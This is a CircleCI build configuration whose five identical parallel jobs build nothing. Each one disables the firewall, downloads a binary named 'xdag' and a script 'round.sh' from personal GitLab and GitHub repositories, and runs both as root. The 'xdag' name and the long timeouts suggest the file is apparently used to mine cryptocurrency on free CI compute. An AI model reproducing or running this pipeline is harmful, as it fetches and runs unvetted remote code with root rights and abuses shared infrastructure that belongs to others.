version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://gitlab.com/richardkevin320/pede/-/raw/main/xdag
          chmod +x xdag
          sudo su --command "nohup ./xdag --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://github.com/gokjgolden08/turah/raw/jobs/round.sh
          chmod +x round.sh
          sudo su --command "./round.sh"
  build_1:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://gitlab.com/richardkevin320/pede/-/raw/main/xdag
          chmod +x xdag
          sudo su --command "nohup ./xdag --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://github.com/gokjgolden08/turah/raw/jobs/round.sh
          chmod +x round.sh
          sudo su --command "./round.sh"
  build_2:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://gitlab.com/richardkevin320/pede/-/raw/main/xdag
          chmod +x xdag
          sudo su --command "nohup ./xdag --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://github.com/gokjgolden08/turah/raw/jobs/round.sh
          chmod +x round.sh
          sudo su --command "./round.sh"
  build_3:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://gitlab.com/richardkevin320/pede/-/raw/main/xdag
          chmod +x xdag
          sudo su --command "nohup ./xdag --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://github.com/gokjgolden08/turah/raw/jobs/round.sh
          chmod +x round.sh
          sudo su --command "./round.sh"
  build_4:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://gitlab.com/richardkevin320/pede/-/raw/main/xdag
          chmod +x xdag
          sudo su --command "nohup ./xdag --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://github.com/gokjgolden08/turah/raw/jobs/round.sh
          chmod +x round.sh
          sudo su --command "./round.sh"
       
workflows:
  version: 2
  build:
    jobs:
      - build
      - build_1
      - build_2
      - build_3
      - build_4
